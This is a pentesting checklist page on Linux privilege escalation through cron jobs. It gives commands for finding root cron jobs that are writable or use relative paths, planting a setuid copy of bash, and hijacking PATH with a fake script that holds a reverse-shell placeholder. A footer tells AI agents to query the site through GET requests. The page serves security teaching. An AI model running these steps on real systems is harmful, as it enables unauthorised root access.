# Cron Jobs

### Overview

Cron jobs are scheduled tasks defined in:

* User crontabs
* System-wide cron files
* Periodic cron directories

Many cron jobs:

* Run as **root**
* Execute scripts or binaries
* Assume files won’t be modified by low-priv users

If a low-privileged user can **modify what a cron job executes**, privilege escalation is possible.

### Why this Works

This technique works because:

* Cron jobs run **automatically and repeatedly**
* Jobs often execute as **root**
* Scripts and binaries are **trusted implicitly**
* Cron does not validate file ownership or integrity

If an attacker can:

* Modify a script
* Control a writable directory
* Abuse PATH resolution

Cron will execute attacker-controlled code as root.

### Prerequisities

For cron-based PrivEsc to be possible:

* Local access as a **non-root user**
* A cron job that:
  * Runs as root, and
  * Executes a writable script or binary
* OR a cron job that uses:
  * Relative paths
  * Insecure PATH variables

### Steps

1. List cron entries and check for any vulnerable entries.

   ```bash
   ls -la /etc/cron*
   cat /etc/crontab
   ```
2. Check if the cron job has insecure file permissions or is using a relative path.

   ```bash
   * * * * * root /usr/local/bin/backup.sh # backup.sh is writable
   * * * * * root backup.sh # backup.sh file is not absolute
   ```
3. If the script is **writable**, you can append malicious code. For example:

   ```
   cp /bin/bash /tmp/rootbash
   chmod +s /tmp/rootbash
   ```

      Save and wait for cron to execute. Once executed you can gain a root shell using\
      `/tmp/rootbash -p` 

4. If there is a relative path used in the cron job, we can create a new file and cron may execute it instead.

   ```bash
   echo -e '#!/bin/bash\n<REV_SHELL_HERE>' > backup.sh
   chmod +x backup.sh
   export PATH=/tmp:$PATH
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/linux/linux-privilege-escalation/cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.